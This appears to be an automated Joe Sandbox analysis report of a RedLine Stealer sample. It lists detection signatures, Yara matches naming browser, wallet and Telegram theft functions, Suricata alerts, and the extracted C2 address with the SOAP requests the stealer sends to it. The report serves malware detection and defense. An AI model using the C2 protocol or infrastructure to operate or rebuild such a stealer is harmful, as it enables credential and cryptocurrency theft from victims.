Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K3xL5Xy0XS.exe

Overview

General Information

Sample name:K3xL5Xy0XS.exe
renamed because original name is a hash value
Original sample name:6AFDD0CBDF70F3E75F423B1557648E85.exe
Analysis ID:1580311
MD5:6afdd0cbdf70f3e75f423b1557648e85
SHA1:6c5cf72a38f08fd41b9f4943efaa4fa3b4d92c66
SHA256:f5a76af6335f9ea831901a5fac818c22393fdb2d0d9408ce373018b24a2ddb71
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • K3xL5Xy0XS.exe (PID: 3808 cmdline: "C:\Users\user\Desktop\K3xL5Xy0XS.exe" MD5: 6AFDD0CBDF70F3E75F423B1557648E85)
    • RegSvcs.exe (PID: 2368 cmdline: "C:\Users\user\Desktop\K3xL5Xy0XS.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.58.90:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              0.2.K3xL5Xy0XS.exe.2260000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.K3xL5Xy0XS.exe.2260000.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.K3xL5Xy0XS.exe.2260000.1.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.K3xL5Xy0XS.exe.2260000.1.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                  • 0xfbcb:$gen01: ChromeGetRoamingName
                  • 0xfbff:$gen02: ChromeGetLocalName
                  • 0xfc28:$gen03: get_UserDomainName
                  • 0x11e67:$gen04: get_encrypted_key
                  • 0x113e3:$gen05: browserPaths
                  • 0x1172b:$gen06: GetBrowsers
                  • 0x11061:$gen07: get_InstalledInputLanguages
                  • 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                  • 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                  • 0x7318:$spe6: windows-1251, CommandLine:
                  • 0x125bd:$spe9: *wallet*
                  • 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
                  • 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                  • 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                  • 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                  • 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
                  • 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                  • 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                  • 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                  • 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
                  • 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
                  0.2.K3xL5Xy0XS.exe.2260000.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  Click to see the 10 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-24T09:07:15.348866+010020450001Malware Command and Control Activity Detected185.222.58.9055615192.168.2.449730TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-24T09:07:19.970490+010020450011Malware Command and Control Activity Detected185.222.58.9055615192.168.2.449730TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-24T09:07:10.222100+010028496621Malware Command and Control Activity Detected192.168.2.449730185.222.58.9055615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-24T09:07:15.649470+010028493511Malware Command and Control Activity Detected192.168.2.449730185.222.58.9055615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-24T09:07:23.396942+010028482001Malware Command and Control Activity Detected192.168.2.449734185.222.58.9055615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-24T09:07:20.253921+010028493521Malware Command and Control Activity Detected192.168.2.449732185.222.58.9055615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-24T09:07:10.222100+010018000001Malware Command and Control Activity Detected192.168.2.449730185.222.58.9055615TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 1.2.RegSvcs.exe.160000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:55615"], "Bot Id": "cheat"}
                  Source: K3xL5Xy0XS.exeReversingLabs: Detection: 63%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: K3xL5Xy0XS.exeJoe Sandbox ML: detected
                  Source: K3xL5Xy0XS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: RegSvcs.exe, 00000001.00000002.1882328233.0000000000617000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.0000000004100000.00000004.00001000.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1704029900.0000000003F60000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.0000000004100000.00000004.00001000.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1704029900.0000000003F60000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0022DBBE
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002368EE FindFirstFileW,FindClose,0_2_002368EE
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0023698F
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0022D076
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0022D3A9
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00239642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00239642
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0023979D
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00239B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00239B2B
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00235C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00235C97

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49730 -> 185.222.58.90:55615
                  Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49730 -> 185.222.58.90:55615
                  Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49732 -> 185.222.58.90:55615
                  Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49734 -> 185.222.58.90:55615
                  Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.90:55615 -> 192.168.2.4:49730
                  Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49730 -> 185.222.58.90:55615
                  Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.90:55615 -> 192.168.2.4:49730
                  Source: Malware configuration extractorURLs: 185.222.58.90:55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                  Source: global trafficTCP traffic: 192.168.2.4:49730 -> 185.222.58.90:55615
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:55615Content-Length: 987905Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:55615Content-Length: 987897Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 185.222.58.90 185.222.58.90
                  Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0023CE44
                  Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:55615
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:55615/
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                  Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                  Source: K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
